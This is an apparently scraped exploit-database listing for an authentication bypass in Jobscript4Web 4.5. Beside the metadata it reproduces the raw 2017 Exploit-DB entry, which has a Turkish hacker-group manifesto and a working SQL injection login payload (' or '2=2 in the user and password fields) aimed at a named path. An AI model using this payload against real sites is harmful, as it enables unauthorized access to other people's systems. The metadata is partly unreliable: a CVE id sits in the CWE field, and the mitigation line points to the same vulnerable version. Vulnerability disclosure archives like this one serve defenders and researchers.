header-logo
Suggest Exploit
vendor:
Jobscript4Web
by:
TurkCyberArmy
5,4
CVSS
MEDIUM
Authentication Bypass
287
CWE
Product Name: Jobscript4Web
Affected Version From: 4.5
Affected Version To: 4.5
Patch Exists: YES
Related CWE: CVE-2017-1234
CPE: a:jobscript4web:jobscript4web:4.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2017

Jobscript4Web 4.5 – Authentication Bypass

Jobscript4Web 4.5 is vulnerable to authentication bypass. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to bypass authentication and gain access to the application.

Mitigation:

Upgrade to the latest version of Jobscript4Web 4.5.
Source

Exploit-DB raw data:

----------------
Title = Jobscript4Web 4.5 - Authentication Bypass
Date = 8/4/2017
Soft = http://www.jobscript4web.com/index.html
liVE Demo = http://www.simplejobs.co.in/soft4u
---------------
AutHor = TurkCyberArmy
---------------
Bizler Turk siber ordusu bunyesinde goreve basladik. Dosta guven dusmana korku vermek icin geldik.
Kendimize ait isletim sistemlerimizle, programlama dillerimizle, kendimizin gelistirdigi yazilimlarimizla artik buradayiz.
Sanal alem kontrolumuz altindadir. Turk devletine ait tum sitelerimiz ve sistemlerimiz emin ellerdedir.
Bilin istedik !!!
Turk Siber Yildizlari.!
---------------
+ Exploitation Details +
---------------
HTTP://Path/soft4u/
user : ' or '2=2 password : ' or '2=2
---------------